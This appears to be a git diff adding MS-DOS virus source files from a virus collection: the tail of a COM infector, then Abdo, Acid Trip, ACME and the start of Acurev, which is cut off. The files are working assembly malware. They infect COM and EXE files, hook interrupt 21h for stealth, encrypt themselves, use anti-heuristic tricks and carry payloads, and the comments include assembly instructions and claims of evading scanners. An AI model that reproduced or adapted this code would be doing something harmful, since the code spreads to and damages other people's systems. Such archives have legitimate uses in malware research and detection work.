reaches root and no more +; uninfected files are found. (One infection per run) +; - Also infects read-only files +; - Restores attributes, initial date/time-stamps, and original path. +; --------------------------------------------------------------------------- + + .model tiny + .code + + org 100h ; adjust for psp + +start: + + call get_disp ; push ip onto stack +get_disp: + pop bp ; bp holds current ip + sub bp, offset get_disp ; bp = code displacement + + ; original label offset is stored in machine code + ; so new (ip) - original = displacement of code + +save_path: + mov ah, 47h ; save cwd + xor dl, dl ; 0 = default drive + lea si, [bp + org_path] + int 21h + +get_dta: + mov ah, 2fh + int 21h + + mov [bp + old_dta_off], bx ; save old dta offset + +set_dta: ; point to dta record + mov ah, 1ah + lea dx, [bp + dta_filler] + int 21h + +search: + mov ah, 4eh ; find first file + mov cx, [bp + search_attrib] ; if successful dta is + lea dx, [bp + search_mask] ; created + int 21h + jnc clear_attrib ; if found, continue + +find_next: + mov ah, 4fh ; find next file + int 21h + jnc clear_attrib + +still_searching: + mov ah, 3bh + lea dx, [bp + previous_dir] ; cd .. + int 21h + jnc search + jmp bomb ; at root, no more files + +clear_attrib: + mov ax, 4301h + xor cx, cx ; get rid of attributes + lea dx, [bp + dta_file_name] + int 21h + +open_file: + mov ax, 3D02h ; AL=2 read/write + lea dx, [bp + dta_file_name] + int 21h + + xchg bx, ax ; save file handle + ; bx won't change from now on +check_if_command_com: + cld + lea di, [bp + com_com] + lea si, [bp + dta_file_name] + mov cx, 11 ; length of 'COMMAND.COM' + repe cmpsb ; repeat while equal + jne check_if_infected + jmp close_file + +check_if_infected: + mov dx, word ptr [bp + dta_file_size] ; only use first word since + ; COM file + sub dx, 2 ; file size - 2 + + mov ax, 4200h + mov cx, 0 ; cx:dx ptr to offset from + int 21h ; origin of move + + mov ah, 3fh ; read last 2 characters + mov cx, 2 + lea dx, [bp + last_chars] + int 21h + + mov ah, [bp + last_chars] + cmp ah, [bp + virus_id] + jne save_3_bytes + mov ah, [bp + last_chars + 1] + cmp ah, [bp + virus_id + 1] + jne save_3_bytes + jmp close_file + +save_3_bytes: + mov ax, 4200h ; 00=start of file + xor cx, cx + xor dx, dx + int 21h + + mov ah, 3Fh + mov cx, 3 + lea dx, [bp + _3_bytes] + int 21h + +goto_eof: + mov ax, 4202h ; 02=End of file + xor cx, cx ; offset from origin of move + xor dx, dx ; (i.e. nowhere) + int 21h ; ax holds file size + + ; since it is a COM file, overflow will not occur + +save_jmp_displacement: + sub ax, 3 ; file size - 3 = jmp disp. + mov [bp + jmp_disp], ax + +write_code: + mov ah, 40h + mov cx, virus_length ;*** equate + lea dx, [bp + start] + int 21h + +goto_bof: + mov ax, 4200h + xor cx, cx + xor dx, dx + int 21h + +write_jmp: ; to file + mov ah, 40h + mov cx, 3 + lea dx, [bp + jmp_code] + int 21h + + inc [bp + infections] + +restore_date_time: + mov ax, 5701h + mov cx, [bp + dta_file_time] + mov dx, [bp + dta_file_date] + int 21h + +close_file: + mov ah, 3eh + int 21h + +restore_attrib: + xor ch, ch + mov cl, [bp + dta_file_attrib] ; restore original attributes + mov ax, 4301h + lea dx, [bp + dta_file_name] + int 21h + +done_infecting?: + mov ah, [bp + infections] + cmp ah, [bp + max_infections] + jz bomb + jmp find_next + + +bomb: + +; cmp bp, 0 +; je restore_path ; original run +; +;---- Stuff deleted + +restore_path: + mov ah, 3bh ; when path stored + lea dx, [bp + root] ; '\' not included + int 21h + + mov ah, 3bh ; cd to original path + lea dx, [bp + org_path] + int 21h + +restore_dta: + mov ah, 1ah + mov dx, [bp + old_dta_off] + int 21h + +restore_3_bytes: ; in memory + lea si, [bp + _3_bytes] + mov di, 100h + cld ; auto-inc si, di + mov cx, 3 + rep movsb + +return_control_or_exit?: + cmp bp, 0 ; bp = 0 if original run + je exit + mov di, 100h ; return control back to prog + jmp di ; -> cs:100h + +exit: + mov ax, 4c00h + int 21h + +;-------- Variable Declarations -------- + +old_dta_off dw 0 ; offset of old dta address + +;-------- dta record +dta_filler db 21 dup (0) +dta_file_attrib db 0 +dta_file_time dw 0 +dta_file_date dw 0 +dta_file_size dd 0 +dta_file_name db 13 dup (0) +;-------- +search_mask db '*.COM',0 ; files to infect: *.COM +search_attrib dw 00100111b ; all files a,s,h,r +com_com db 'COMMAND.COM' + +previous_dir db '..',0 +root db '\',0 +org_path db 64 dup (0) ; original path + +infections db 0 ; counter +max_infections db 1 + +_3_bytes db 0, 0, 0 +jmp_code db 0E9h +jmp_disp dw 0 + +last_chars db 0, 0 ; do last chars = ID ? + +virus_id db 'AZ' + +eov: ; end of virus + +virus_length equ offset eov - offset start + + end start + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.abdo.asm b/MSDOS/Virus.MSDOS.Unknown.abdo.asm new file mode 100644 index 00000000..658253f2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.abdo.asm @@ -0,0 +1,180 @@ +; NAME: Abdo.com +; AUTHOR: Sea4 +; SIZE: 310 bytes +; ENCRYPTION: Yep +; STEALTH: Nope +; ROI: All files in current DIR +; DT: Nope + +; Here is an interesting concept in encryption. Brought to my attention by +; Aperson. The virus will use the host programs own bytes to XOR against. Its +; very interesting because there is no way to tell what the host will have +; as its values, so the encryption could almost be considered random. Upon +; infection, the father virus will read from the victim file enough bytes to +; cover the encrypted area. It will then, XOR each virus byte against each +; host byte and keep the results in the buffer. It will then write those new +; bytes to the victim. Upon startup of the victim it will call the Decryption +; with a pointer (BX) to the bytes to use as Decryptors. Of course this has +; a flaw if the host program decides to change its own bytes, though highly +; uncommon among normal progges. Enjoy! + +Start: +jmp V_start ; Jump to start of virus + +V_start: ; delta offset stuff +call Delta +Delta: +pop bp +sub bp,offset delta + +SkipDec: ; Call decryption +jmp Ende +; mov cx,Crypto-Hidden +lea si,[bp+Hidden] +mov di,si +mov bx,103h +Call Crypto + +Hidden: + +mov di,100h ; Restore first 3 bytes +lea si,[bp+saved] +mov cx,3 +rep movsb + +mov ah,4Eh ; Find first/next com files +FindNext: +xor cx,cx +lea dx,[bp+FileMask] +int 21h + +jnc Open ; Found one, open it +jmp Exit ; Didn't find any, return to progge + +Close: +jmp ShutFile + +Open: +mov ax,3D02h ; Open file +lea dx,9Eh +int 21h + +xchg bx,ax ; File handle into BX + +mov ah,3Fh ; Read first bytes into buffer +lea dx,[bp+saved] +mov cx,3 +int 21h + +xor ax,ax +cmp ax,[80h+1Ch] +jnz Close + +mov ax,[80h+1Ah] + +cmp ax,0F000h ; Infection criteria +jnc Close ; No files > 61440d bytes +cmp ax,400h ; None < 1024d bytes +jc Close + +sub ax,3 ; Makes account for the JMP +sub ax,Ende-V_start ; Subtracts the length of virus + +cmp ax,[bp+saved+1] ; If the file jumps to AX then it must be + ; infected with this virus, or its very lucky +je Close ; Close it up if its already infected + +mov ax,[80h+1Ah] ; Set new JMP destination +sub ax,3 ; Subtracts the JMP length +mov [bp+jumpto],ax ; Puts the jumpto location in its buffer + +mov ax,4200h ; Return file pointer to beginning of file +xor dx,dx +xor cx,cx +int 21h + +mov ah,40h ; Writes the new JMP +mov cx,3 +lea dx,[bp+jumping] +int 21h + +XorValues EQU Crypto-Hidden+Buffer + +mov ah,3Fh ; Read from File to get XORvalues +lea dx,[bp+xorvalues] ; The file pointer is already at 00:03h + ; now we just need to put the bytes in a buffer +mov cx,Crypto-Hidden ; Length of Bytes to get ( Same length as hidden + ; area, because thats all we need. ) +int 21h ; Tells DOS to fetch some bytes + +mov ax,4202h ; Move File pointer to end of progge +xor cx,cx +xor dx,dx +int 21h + +mov ah,40h ; Write Call decryption routines +lea dx,[bp+v_start] +mov cx,Hidden-V_start +int 21h + +lea di,[bp+buffer] ; Call encryption of Hidden area +lea si,[bp+hidden] +mov cx,Crypto-Hidden +push cx ; Saves CX for the write +push bx ; Saves BX because it is the file handle +lea bx,[bp+xorvalues] ; Place where victim file's bytes have been put +call Crypto ; Calls the encryption routine +pop bx ; Retrieves the file handle for the Write + +mov ah,40h ; Write encrypted area to file +pop cx +lea dx,[bp+buffer] +int 21h + +lea dx,[bp+crypto] ; Write encryption routine to victim +mov cx,Ende-Crypto +mov ah,40h +int 21h + +ShutFile: ; Close victim and search for next +mov ah,3Eh +int 21h +mov ax,4F00h +jmp FindNext + +Exit: +push 100h +ret + +FileMask db '*.com',0 +VirusName db '[Abdo]',0 +Author db 'Sea4, CodeBreakers',0 +message db 'Concept by: Aperson of the CodeBreakers!' + +Saved db 0CDh,020h,090h +Jumping db 0E9h +jumpto db 0h,0h + +Crypto: +EncLoop: +lodsb ; Takes the byte from [SI] +mov dl,[bx] ; Gets the next byte of host file +xor al,dl ; XORs the 2 bytes, and saves them in AL +inc bx ; Moves to next byte +stosb ; Places the byte back in [DI] +loop EncLoop ; Does 'em all +ret ; Return to calling routine + +Buffer: + +Ende: +lea di,SkipDec +lea si,NewBytes + +mov cx,3 +rep movsb +jmp Hidden + +NewBytes: +mov cx,Crypto-Hidden +Finish: diff --git a/MSDOS/Virus.MSDOS.Unknown.acidtrip.asm b/MSDOS/Virus.MSDOS.Unknown.acidtrip.asm new file mode 100644 index 00000000..bf1ed4fb --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.acidtrip.asm @@ -0,0 +1,459 @@ +; +; Acid Trip by Crypt Keeper [Phalcon/Skism] +; +; Acid Trip is an Enemy Within variant with a trigger routine and +; a few bug fixes. It goes off at 12:00pm (any day) if the monitor +; is in 80x25x16color text mode, scrolling wildly through the color +; pallete and displaying "Your PC is on an [Acid Trip]... Try again +; later..." near the center of the screen. +; + +; To compile: + +; TASM ACIDTRIP.ASM /M3 +; TLINK ACIDTRIP.OBJ /t +; .COM file can be executed with no modifications + + .model tiny + .code + + org 100h ;make this a com file + +acidtrip: + +;---------------------------------------------------------------------------- + +vlength equ vbot-offset(acidtrip) ;Virus length in bytes +heapsiz equ hbot-htop ;size of heap data in bytes +ressize equ 1256/16 ;Virus size resident +virusid equ 08AC5h ;Virus ID word in EXE header +chkfunc equ 0FFFFh ;Check resident function for int 21h + +;---------------------------------------------------------------------------- + + push ds es ;save startup registers + + db 0BDh ;mov bp, +delta dw 0 ;delta offset + + xor ax,ax + dec ax ;AX=FFFF (check resident function) + int 21h ;check if virus is resident + + inc ax ;is virus resident (zero if yes) + jz return ;if so, don't install + + ;Microsoft Windows/Desqview compatable load resident routine +install: + mov ah,48h ;allocate memory + mov bx,ressize ;amount of memory to request + int 21h + + jc not_enough_memory ;carry set means allocation error + + mov es,ax ;ax=segment of allocated memory + + dec ax + mov ds,ax ;segment of MCB for memory + mov word ptr ds:[01h],08h ;set memory block as independant + jmp short memory_allocation_complete +not_enough_memory: + pop ax + push ax ;get PSP value off stack + mov es,ax ;ES=PSP for set memory block size + dec ax + mov ds,ax ;get segment of this program's MCB + + mov bx,word ptr ds:[03h] ;get size of current block + dec bx ;decrease size of memory block + + mov ah,4Ah ;set memory block size + int 21h + + jc return ;return if allocation error + jmp short install ;try to allocate again +memory_allocation_complete: + push cs + pop ds + + push es ;save found target segment + + mov ax,3521h ;get int 21h vector + int 21h + + mov [bp+offset(i21vecs)],es + mov [bp+offset(i21veco)],bx + + pop es + + mov cx,(vlength+heapsiz+1)/2 ;words to move + mov di,100h ;destination in memory + lea si,[bp+offset(acidtrip)] ;source of viral code + + rep movsw ;copy ourselves up there + + push es + pop ds ;segment to set int vector + mov dx,offset(i21vec) ;int 21h vector + + mov ax,2421h ;set int 21h vector + inc ah ;without setting off mem resident + int 21h ;code heuristic flags + +return: pop bx ;segment of PSP + mov es,bx + + add bx,16 ;compensate for PSP size + add cs:[bp+offset(old_cs)],bx ;add PSP to initial CS + + pop ds ;restore old DS register + + cli ;clear interrupt enable flag + mov ax,cs:[bp+offset(old_ss)] ;old SS register + add ax,bx ;add PSP adress + mov ss,ax + db 0BCh ;mov sp, +old_sp dw 0 ;old stack pointer + sti ;set interrupt enable flag + + jmp dword ptr cs:[bp+offset(old_ip)] ;jump to original EXE code + +;---------------------------------------------------------------------------- + +vauthor db 'Crypt Keeper P/S' + +old_ip dw 0 +old_cs dw 0FFF0h ;Old CS:IP + +old_ss dw 0FFF0h ;old stack segment + +message db 'Your PC is on an [Acid Trip]... Try again later...$' + +;---------------------------------------------------------------------------- + +i21vec: cmp ax,chkfunc ;check resident function? + jne no_check_func + + iret ;return from interrupt + +no_check_func: + push ax bx cx dx ;push all used registers + + mov ah,2Ch ;get time + call function + + cmp cx,0C00h ;12:00pm? + jne no_trippin ;if not, don't trigger + + mov ah,15 ;return current video state + int 10h ;BIOS video call + + cmp al,3 ;text mode? + jne no_trippin ;if not, don't trigger + + mov dx,0A0Fh ;row,column for cursor + mov ah,2 ;set cursor position + int 10h + + push cs + pop ds + + mov dx,offset(message) ;message to display + mov ah,9 ;print string + call function + + mov ax,1002h ;Set palette registers, from buffer +trippin: + inc dx ;move to next group of numbers in mem + int 10h + jmp short trippin + +no_trippin: + pop dx cx bx ax ;pop old registers + + push ax ;save old AX + inc ah ;avoid execute intercept heuristic flags + + cmp ax,4C00h ;load and execute program? + je _infect_on_exec + + cmp ax,4C01h ;load program? + je _infect_on_exec + + pop ax ;restore old AX value + + cmp ah,11h ;find first file (FCB)? + je FCB_dir_stealth + + cmp ah,12h ;find next file (FCB)? + je FCB_dir_stealth + + cmp ah,4Eh ;find first file (DTA)? + je DTA_dir_stealth + + cmp ah,4Fh ;find next file (DTA)? + je DTA_dir_stealth + +exit_interrupt_chained: + jmp dword ptr cs:i21veco ;execute rest of interrupt chain +_infect_on_exec: + pop ax ;restore old AX + jmp infect_file ;and attempt to infect + +FCB_dir_stealth: + call function ;go ahead and execute + + pushf + push dx cx bx es ax ;push all used registers + + test al,al ;was find successful? + jnz exit_interrupt_stealth + + mov ah,51h ;Get PSP address + int 21h + + mov es,bx ;ES=PSP address + + sub bx,word ptr es:[16h] ;parent PSP? + jnz exit_interrupt_stealth + + mov bx,dx + mov al,byte ptr [bx] ;first byte of FCB + + push ax + + mov ah,2Fh ;get DTA adress + int 21h + + pop ax + + inc al + jnz checkFCBinfected ;extended FCB? + + add bx,007h ;If so, make into normal + +checkFCBinfected: + mov ax,word ptr es:[bx+17h] + mov cx,word ptr es:[bx+19h] ;Get time and date + + and ax,1Fh + and cx,1Fh + dec cx ;unmask seconds and date + + xor ax,cx ;file infected? + jnz exit_interrupt_stealth ;exit stealth interrupt + + sub word ptr es:[bx+01Dh],vlength + sbb word ptr es:[bx+01Fh],ax ;subtract virus size + +exit_interrupt_stealth: + pop ax es bx cx dx + popf ;pop all used registers +exit_interrupt_stealthvec: + retf 02h ;return with given flags + +DTA_dir_stealth: ;DTA directory size subtract + call function ;go ahead and execute + + jc exit_interrupt_stealthvec ;exit if function unsuccessful + + pushf + push dx cx bx es ax ;push all used registers + + mov ah,2Fh ;get DTA adress + int 21h + + mov ax,word ptr es:[bx+16h] + mov cx,word ptr es:[bx+18h] ;get time and date stamps + + and ax,1Fh + and cx,1Fh + dec cx ;unmask seconds and date + + xor cx,ax ;is file infected? + jnz exit_interrupt_stealth ;if not, don't subtract size + + sub word ptr es:[bx+1Ah],vlength + sbb word ptr es:[bx+1Ch],cx ;subtract virus size in bytes + + jmp short exit_interrupt_stealth + +move_pointer_end: + cwd ;zero cx and dx + mov cx,dx + mov ax,4202h ;move pointer from EOF +function: + pushf + call dword ptr cs:i21veco ;simulate call to original int 21h + ret +open_readwrite: ;opens file at DS:DX for read/write + mov ax,3D00h ;open for read only access + int 21h + + jc bad_open ;carry set means open error + + push cs + pop ds + + push ax ;file handle + mov bx,ax + + mov ax,1220h ;get JFT entry + int 2Fh + + mov ax,1216h ;get SFT location + mov bl,byte ptr es:[di] ;handle number + int 2Fh + + pop bx + + mov word ptr es:[di+02h],2 ;set file for read/write + ret +bad_open: + pop ax + jmp short exit_infect ;exit if bad open +infect_file: + push ax si es di bx cx ds dx ;push all used registers + + call open_readwrite ;open file for read/write access + + mov cx,24 ;24 bytes of header to read + mov dx,offset(exeheader) ;EXE header information + + mov ah,3Fh ;read file or device + int 21h + + cmp cx,ax ;enough bytes read? + jne bad_file ;if not, file too small + + mov cx,exeid + cmp cx,'MZ' + je disease_exe + xor cx,'ZM' + jz disease_exe ;exe file? + +bad_file: + mov ah,3Eh ;close file with handle + int 21h + +exit_infect: + pop dx ds cx bx di es si ax ;pop all used registers + jmp exit_interrupt_chained ;execute rest of interrupt chain + +disease_exe: + cmp chksum,virusid ;file already infected? + je bad_file ;if so, bad file + + lds si,dword ptr es:[di+0Dh] ;get old file date and time + push si ds ;and save + + push cs + pop ds + + add minallc,ressize ;add virus size in paragraphs + + push es ;save SFT segment + + les si,dword ptr ds:initss ;get initial SS:SP (reversed) + mov old_ss,si + mov old_sp,es + + les si,dword ptr ds:initip ;get initial CS:IP + mov old_cs,es + mov old_ip,si + + pop es + + call move_pointer_end ;move file pointer to end of file + + mov cx,16 + div cx ;convert file size to seg:offset + + sub ax,headers ;subtract header size from segment + + mov initcs,ax + mov initip,dx ;set initial cs:ip + + sub dx,100h + mov delta,dx ;set delta offset in virus code + + add dx,offset(sspace)+64+100h + mov initsp,dx + mov initss,ax ;set initial SS:SP in exe header + + mov chksum,virusid ;set file as already infected + + mov dx,100h ;offset of virus code in memory + mov cx,vlength ;length of virus code + + mov ah,40h ;write file or device + push ax + int 21h + + call move_pointer_end ;get file size + + mov cx,512 + div cx ;convert to pages + + test dx,dx ;no remainder? + jz no_remainder + + inc ax ;if remainder add another page +no_remainder: + mov expages,ax + mov exbytes,dx ;set new exe size + + cwd + mov word ptr es:[di+15h],dx + mov word ptr es:[di+17h],dx ;zero file pointer in SFT + + mov dx,offset(exeheader) ;exe header information + mov cx,24 ;24 bytes to change + + pop ax ;write file or device + int 21h + + pop dx cx ;old file date/time + + push dx ;save original file date + and cx,-20h ;reset seconds + and dx,1Fh + dec dx ;unmask date field + + or cx,dx ;seconds=date + pop dx ;restore old date + + mov ax,5701h ;set file date and time + int 21h + + jmp bad_file ;close and exit + +;---------------------------------------------------------------------------- + +vbot equ $ ;bottom of virus code +htop equ $ ;top of heap + +i21veco dw 0 +i21vecs dw 0 ;old int 21h vector + +exeheader: +exeid dw 0 ;Unchanged ;EXE signature +exbytes dw 0 ;number of bytes in last page +expages dw 0 ;number of pages in file +reloci dw 0 ;Unchanged ;number of items in relocation table +headers dw 0 ;Unchanged ;size of header in paragraphs +minallc dw 0 ;minimum memory to be allocated +maxallc dw 0 ;Unchanged ;maximum memory to be allocated +initss dw 0 ;initial SS value +initsp dw 0 ;initial SP value (used as ID word) +chksum dw 0 ;complimented checksum +initip dw 0 ;initial IP value +initcs dw 0 ;initial CS value +reltabl dw 0 ;Unchanged ;byte offset to relocation table +ovnum dw 0 ;Unchanged ;overlay number + +hbot equ $ ;bottom of heap data + +sspace db 70 dup (0) ;virus stack + +end acidtrip ;end of virus code diff --git a/MSDOS/Virus.MSDOS.Unknown.acme.asm b/MSDOS/Virus.MSDOS.Unknown.acme.asm new file mode 100644 index 00000000..1a442cea --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.acme.asm @@ -0,0 +1,300 @@ +; ACME COMPANION VIRUS for Crypt Newsletter 9 +; +; ACME is a fast and simple companion virus which will create a +; spawned copy of itself for EVERY .EXE file it can find in the +; current directory. +; +; ACME is ready to assemble using A86. If you recall, an earlier Crypt +; letter included an A86-only source listing. (Strict TASM/MASM compatible +; assemblers will need the manual addition of a couple simple declarative +; statements.) I included ACME in this form so fans of Isaacson's +; technique can gloat about the code not requiring "red tape." ;-] +; A86 will assemble ACME directly to a .COMfile virus, no linker +; necessary. +; +; ACME currently eludes all scanners and as a companion virus, openly +; defies every integrity checker I have in my inventory with the EXCEPTION +; of Stiller Research's. This issue includes a quality report on +; Solomon's Toolkit, so it's only fair to state that while the documentation +; for this product seems to indicate that the developers know what a +; companion infection is, the software does nothing to protect against +; it in default mode. ACME flies through the Toolkit, for now. Go figure. +; +; ACME will also play a generic ACME-style virus tune late in the +; afternoon. Those who fancy a musical virus but have never heard one are +; encouraged to play with ACME. Set your system clock to anytime after +; 4:00 pm. The musical payload takes up most of the space in this virus, +; removing it shaves the virus to 242 bytes - nice and small if you like. +; +; The virus purist may recognize the root of ACME as a piece of code known +; as ZENO - a small, single-step companion infector. ZENO's author is +; thanked, wherever he/she is. + + +START: + + jmp VIR_BEGIN ; get going + + +WILDCARD DB "*.EXE",0 +FILE_EXT DB "COM",0 +FILE_FOUND DB 12 DUP(' '), 0 +FILE_CREATE DB 12 DUP(' '), 0 +SEARCH_ATTRIB DW 17H +NUM_INFECT DW 0 +MUZIK DW 4304,0006, 4063,0006, 4304,0006, 4063,0006, ;MUZIK - notes/delay + DW 3043,0006, 4831,0006, 4063,0006, 3043,0006, ;in format xxxx,yyyy + DW 4304,0006, 4063,0006, 4304,0006, 4063,0006, + DW 3043,0006, 4831,0006, 4063,0006, 3043,0006, + DW 4304,0006, 4063,0006, 4304,0006, 4063,0006, + DW 3043,0006, 4831,0006, 4063,0006, 3043,0006, + DW 4304,0006, 4063,0006, 4304,0006, 4063,0006, + DW 3043,0006, 5119,0006, 5423,0006, 3043,0006, + DW 6087,0020, + + DW 6087,0006, + DW 7239,0006, 3619,0006, 4831,0006, 6087,0006 + DW 7670,0006, 7239,0006, 4831,0006, 3619,0006 + + DW 6087,0006, 4063,0006, 3043,0006, 5119,0006 + DW 4831,0006, 6087,0006, 7239,0006, 8126,0006 + DW 6087,0020, + + DW 4304,0006, 4063,0006, 4304,0006, 4063,0006, + DW 3043,0006, 4831,0006, 4063,0006, 3043,0006, + DW 4304,0006, 4063,0006, 4304,0006, 4063,0006, + DW 3043,0006, 4831,0006, 4063,0006, 3043,0006, + DW 4304,0006, 4063,0006, 4304,0006, 4063,0006, + DW 3043,0006, 5119,0006, 5423,0006, 3043,0006, + DW 6087,0020, + + DW 6087,0006, + DW 7239,0006, 3619,0006, 4831,0006, 6087,0006 + DW 7670,0006, 7239,0006, 4831,0006, 3619,0006 + + DW 6087,0006, 4063,0006, 3043,0006, 5119,0006 + DW 4831,0006, 6087,0006, 7239,0006, 8126,0006 + DW 6087,0020, + + DW 7670,0006, 7239,0006, 4831,0006, 3619,0006 + DW 3043,0006, 3619,0006, 4831,0006, 6087,0006 + DW 3043,0010, + + DW 4304,0006, 4063,0006, 4304,0006, 4063,0006, + DW 3043,0006, 4831,0006, 4063,0006, 3043,0006, + DW 4304,0006, 4063,0006, 4304,0006, 4063,0006, + DW 3043,0006, 4831,0006, 4063,0006, 3043,0006, + DW 4304,0006, 4063,0006, 4304,0006, 4063,0006, + DW 3043,0006, 5119,0006, 5423,0006, 3043,0006, + DW 6087,0020, + + DW 7670,0006, 7239,0006, 4831,0006, 3619,0006 + DW 3043,0006, 3619,0006, 4831,0006, 6087,0006 + DW 3043,0010, + + DW 6087,0006, + DW 7239,0006, 3619,0006, 4831,0006, 6087,0006 + DW 7670,0006, 7239,0006, 4831,0006, 3619,0006 + + DW 6087,0006, 4063,0006, 3043,0006, 5119,0006 + DW 4831,0006, 6087,0006, 7239,0006, 8126,0006 + DW 6087,0020, + + DW 0ffffh + + + +My_Cmd: +CMD_LEN DB 13 +FILE_CLONE DB 12 DUP (' '), 0 + +;------------------------------------------------------------------; +Prepare_command: + cld + mov di,OFFSET FILE_CLONE + mov al,0 + mov cx,12 + repne scasb ; find the end of string \0 + + mov al,0Dh ; + stosb ; replace \0 with a + + mov ax,12 ;store length of the command + sub ax,cx + mov CMD_LEN, al + ret + +;------------------------------------------------------------------; +Store_name: + + mov di,OFFSET FILE_FOUND ;Point to buffer. + mov si,158 ;stow the file found in buffer + mov cx,12 + rep movsb + + mov di,OFFSET FILE_CREATE ;Point to buffer. + mov si,158 + mov cx,12 + rep movsb + + cld + mov di,OFFSET FILE_CREATE + mov al,'.' + mov cx,9 + repne scasb ;find the '.' + + mov si,OFFSET FILE_EXT + mov cx,3 + rep movsb ;replace the .EXE with .COM + ;from buffer + ret + + +;------------------------------------------------------------------; + ;Does the file exist? + +Check_file: + mov dx,OFFSET FILE_CREATE + mov cx,0 + mov ax,3d00h ; Open file, read only + int 21h + +Chk_done: + ret + +;------------------------------------------------------------------; +Infect_file: ;create companion routine + + mov dx,OFFSET FILE_CREATE ;contains name of "companion" + mov cx,0 + mov ah,3ch ;construct file + int 21h + jc EXIT + + ;Write virus to companion file + mov bx,ax + mov cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length + mov dx,OFFSET START + mov ah,40h ;write to file function + int 21h ;do it + + ;Close file + mov ah,3eh ; ASSUMES bx still has file handle + int 21h + + ;Change attributes + mov dx,OFFSET FILE_CREATE ;of created file to + mov cx,3 ;(1) read only and (2) hidden + mov ax,4301h + int 21h + + ret + +;------------------------------------------------------------------ +; Read all the directory filenames and store as records in buffer. +;------------------------------------------------------------------ + +Vir_begin: + mov ah,02Ch ;DOS get time function + int 021h + mov al,ch ;Copy hour into AL + cbw ;Sign-extend AL into AX + cmp ax,0010h ;Did the function return 16 (4 pm)? + jge TOON ;If greater than or equal, muzik! + + + mov sp,offset STACK_HERE ;move stack down + mov bx,sp + add bx,15 + mov cl,4 + shr bx,cl + mov ah,4ah ;deallocate rest of memory + int 21h + + mov di,OFFSET FILE_CLONE ;Point to buffer. + mov si,OFFSET FILE_FOUND + mov cx,12 + rep movsb + +Read_dir: mov dx,OFFSET WILDCARD ;file mask for directory search + mov cx,SEARCH_ATTRIB + + mov ah,4Eh ;find the first matching file + int 21h + + jc EXIT ;If empty directory, exit + +Do_file: + call STORE_NAME + call CHECK_FILE + call INFECT_FILE + + + +Find_next: + mov ah,4fh ; find next file and keep finding until + int 21h ; all + jnz Do_File ; infected + +Exit: + + ; Run the original program + call Prepare_command + mov si, OFFSET MY_CMD + int 2Eh ; Pass command to command + ; interpreter for execution + + mov ax,4C00H ; Exit to DOS + int 21h + +;------------------------------------------------------------------- +;This routine enables ACME virus to compel the pc to play the +;ACME virus song just about the time the clock-watchers are getting +;ready to leave +;------------------------------------------------------------------- +TOON: + cli ;interrupts off + mov al,10110110xb ;the number + out 43h,al ;to send to the speaker + lea si,MUZIK ;point (si) to the ACME note table + +TOON2: cld + lodsw ;load word into ax and increment (si) + cmp ax,0ffffh ;is it ffff? If so, end of table + jz GO_MUZIK2 ;so, time to jump into endless loop + out 42h,al + mov al,ah + out 42h,al ;send it next + in al,61h ;get value to turn on speaker + or al,00000011xb ;OR the gotten value + out 61h,al ;now we turn on speaker + lodsw ;load the repeat loop count into (ax) +LOOP6: + mov cx,8000 ;delay count +LOOP7: + loop LOOP7 ;do the delay + dec ax ;decrement repeat count + jnz LOOP6 ;if not = 0 loop back + in al,61h ;all done + and al,11111100xb ;number turns speaker off + out 61h,al ;send it + jmp short TOON2 ;now go do next note +GO_MUZIK2: ;our loop point + + sti ;enable interrupts + jmp TOON ;jump back to beginning - this code + ; has the additional advantage of + ;locking out CTRL-ALT-DEL reboot. + ;The user must do a hard reset to recover from ACME. + + + +END_OF_CODE = $ + +STACK_HERE EQU END_OF_CODE + 512 + + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; diff --git a/MSDOS/Virus.MSDOS.Unknown.acurev.asm b/MSDOS/Virus.MSDOS.Unknown.acurev.asm new file mode 100644 index 00000000..077f098b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.acurev.asm @@ -0,0 +1,165 @@ +; ------------------------------------------------------------------------- ; +; Acurev v1.8 coded by KilJaeden of the Codebreakers 1998 ; +; ------------------------------------------------------------------------- ; +; Description: ; +; ; +; v1.0 - start with a simple *.com overwritter ; +; v1.1 - add XOR encryption ohhh yeah :) ; +; v1.2 - add restoring time/date stamps ; +; v1.3 - now we can infect even read only files! hah! ; +; v1.4 - why infect only one directory when you can do many? hehe ; +; v1.5 - add Anti-Heuristic tricks yehaw! ; +; v1.6 - display a message on girlfriends bday ; +; v1.7 - display a different message every saturday ; +; v1.8 - make it 666 bytes big hehe ; +; ------------------------------------------------------------------------- ; +; to compile ::] tasm acurev.asm ; +; to link :::::] tlink /t acurev.obj ; +; ------------------------------------------------------------------------- ; + +code segment ; name our segment "code" + assume cs:code,ds:code ; assign CS and DS to code + org 100h ; this is a .com file now + +start: + mov cx,0FFFFh ; mmmmmmmm anti-heuristics + +anti_one: + jmp anti_two ; jump to anti_two + mov ax,4c00h ; terminate program + call do_int21 ; terminate this shit + +anti_two: + loop anti_one ; loop anti_one heh + +;xor_start: + lea si,encrypted ; SI points to encrypted area start + mov di,si ; mov SI to DI + mov cx,finished-encrypted ; # of bytes in encrypted area + call encryption ; call the encryption routine + jmp encrypted ; jump to start of encrypted area + +encryption: + lodsb ; load a byte + xor al,byte ptr [decrypt] ; xor the byte with our key + stosb ; return the byte + loop encryption ; loop until done + ret ; return from call + + decrypt db 0 ; decryption key value 0 + +encrypted: + mov ah,4eh ; find the first file + +get: + xor cx,cx ; cx to 0 + lea dx,comfile ; load *.com string + call do_int21 ; and get the first .com + jc new_dir ; no more .com? new dir + + mov dx,9eh ; get the file name info + mov ax,4301h ; set file attributes + xor cx,cx ; to absolutely none + call do_int21 ; can infect read only files now! + + mov ax,3d02h ; open the file read / write + mov dx,9eh ; get the file name info + call do_int21 ; open it / get file info now + xchg bx,ax ; move the file info to BX + + mov ax,5700h ; get time / date stamps + call do_int21 ; get them now + mov time,dx ; save the value here + mov date,cx ; and save the value here + + in al,40h ; get a random value from clock + mov byte ptr [decrypt],al ; save the value as our key + lea si,encrypted ; load the start of encrypted area + lea di,finished ; load the end of encrypted area + mov cx,finished-encrypted ; total # of bytes between them + call encryption ; and encrypt them now + + mov ah,40h ; write to file + mov cx,encrypted-start ; total # of bytes to write + lea dx,start ; and start writting from here + call do_int21 ; write diz shitz man! + + mov ah,40h ; write to file + mov 